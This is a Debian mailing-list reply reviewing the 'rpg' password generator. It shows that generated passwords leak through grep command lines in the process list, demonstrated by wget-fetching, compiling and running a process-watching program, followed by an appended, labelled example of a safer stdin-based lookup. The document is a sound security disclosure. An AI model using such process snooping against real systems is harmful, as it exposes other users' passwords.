Re: Bug#659047: RFS: rpg - Readable Password Generator
Vladimir Stavrinov <vstavrinov@gmail.com> writes:
> The advantage of this utility is indicated by its name: "READABLE password
> generator". If you can read (i.e. pronounce) it, then it is easy to
> remember. But "readable" doesn't mean "weak" - it is strong enough
> as long as a dictionary is available for consulting to exclude words
> found there.

I think rpg is very insecure since all local users of the system can see
the passwords that you generate. All they need to do is to look for the
"grep" commands that appear in the process list.

When I run

$ ./rpg
efi4vudamna
andumfepibit
azukvemipa
Ardibute
pazetmivudub

I can clearly see the passwords using a very simple program:

lindi2:~$ wget -q http://iki.fi/lindi/watchps.c
lindi2:~$ gcc -O2 -Wall -o watchps watchps.c
lindi2:~$ echo /lib/x86_64-linux-gnu | ./watchps
helper got 2150, waiting for 2151
woke up
...
cmdline: "grep -wEqi ^andumfepibit$ /usr/share/dict/words "
...
cmdline: "grep -wEqi ^azukvemipa$ /usr/share/dict/words "
...
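
Added example (not part of the original message, and not rpg's own code): one way to run the same dictionary lookup without the candidate appearing in any process's argument list. It assumes a grep that accepts `-f -` (patterns read from stdin, as GNU grep does); the function names and the small word list are constructed for illustration.

```shell
#!/bin/sh
# Added example. DICT is a constructed word list standing in for
# /usr/share/dict/words so the script runs anywhere.
DICT=$(mktemp)
trap 'rm -f "$DICT"' EXIT
printf '%s\n' password Readable generator > "$DICT"

# Form seen in the process list above: the candidate is an argument to
# grep, so it is readable in /proc/<pid>/cmdline while grep runs.
in_dict_argv() {
    grep -wEqi "^$1\$" "$DICT"
}

# Same lookup with the candidate sent as a pattern on stdin (-f -).
# printf is a shell builtin, so no process is started with the candidate
# in its argument list. -F: literal string, -x: whole line, -i: ignore
# case, -q: exit status only.
in_dict_stdin() {
    printf '%s\n' "$1" | grep -Fxiqf - "$DICT"
}

# Constructed candidates: one dictionary word, one generated-style string.
for candidate in Readable andumfepibit; do
    if in_dict_stdin "$candidate"; then
        echo "reject: candidate is a dictionary word"
    else
        echo "accept: candidate is not in the dictionary"
    fi
done
```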